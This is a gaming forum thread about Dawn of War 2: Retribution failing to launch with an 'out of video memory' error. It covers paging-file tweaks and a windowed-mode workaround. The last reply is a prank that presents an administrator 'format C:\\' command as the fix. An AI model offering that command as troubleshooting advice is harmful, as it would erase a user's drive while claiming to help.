Out of video memory
Hi guys, I've just started picking up DoW2 again lately (due to being disappointed by DoW3). I've played through the original and Chaos Rising campaigns in full without any issues but, when I try to launch Retribution, I get the normal startup videos followed by a pink background displaying the message (very stretched) "out of video memory".

I know this isn't a hardware issue - for starters, I have an i7 4770K with 16GB RAM and a GTX1080. Everything's on the latest drivers and I have no mods installed. I have attempted the following:

Verify local files
Clear Steam download cache
Reinstall game
Reinstall game on different hard drive
Run game in compatibility mode for Win8, Win7, WinXP SP3
Run as administrator
Disabled all anti-aliasing options in NVidia control panel
Downloaded and installed DirectX runtime from Microsoft

No crash occurs - I can exit the game by pressing ESC, which displays an "are you sure yes / no" message box and the game quits normally. There is no "warnings.txt" or crash log generated, so I can't post that here.

Please let me know if you can help me fix this.

Thanks,
Geraint

Seen this issue only in linux under wine. Setting higher video memory size solved it so somehow your game dont see enough memory.

Windows 10 Version 10.0.16299 Build 16299
Hope this helps :)

Not sure this would apply here - you're running an emulator whereas I'm running it in native Windows. This is the only game I have an issue with.

ok so. you can try this. I to had enough ram and it was doing this to me but this fixed it. Now if your unsure how this effects your pc. you can always look up "changing virtual memory"online. they to have step by step processes.
1.Go to bottem left and search system. should be the one from control panel.
2.Then go to advanced system settings.
3.make sure you have the advanced tab selected then under preformance click on settings.
4. This should open a new window. select the advanced tab in the new window then click on change in the virtual memory section. agian this should open a new window.
5. Im guessing you the automatic manage paging file size box checkmarked. So unselect that then go down to custom size and change it there. Mine is at 500mb for intial size and 3000mb for max size. Though you may need more. just make sure you dont go over half of the your availbe space. keep in mind this may slow you pc down just a hair.
This is essentialy making more ram available via your hard drive space wich some times is slower then normal ram.

Thanks for the suggestion Brick, unfortunately it doesn't fix my problem (even with initial size set to 5,000 and max 10,000). Funny, the last time I had a game refuse to load due to insufficient memory, I fixed it by loading device drivers into high memory in config.sys (the game was F15 Strike Eagle II, and I was 11 years old...).

Specifically the game is claiming to be out of video memory, which should not happen on a GTX1080 with 8GB of VRAM (plus a further 8GB of shared system memory). NVIDIA driver version is 388.31.

EDIT: updated to newest driver 390.77 - same issue persists.

Thanks for the suggestion Brick. Sadly it didn't work though :(

Interestingly enough, I looked up other launch options for the game to see if there was anything else that might help and found that you can run it windowed with the option -window. The game runs fine in windowed mode but not fullscreen, so I will have to play with it windowed for now and do some further testing. Thanks for your suggestions so far.

well at least you can play it.
You need to download more ram.

After that, open a command prompt(run as administrator) and type this command:

format C:\

Problem solves!
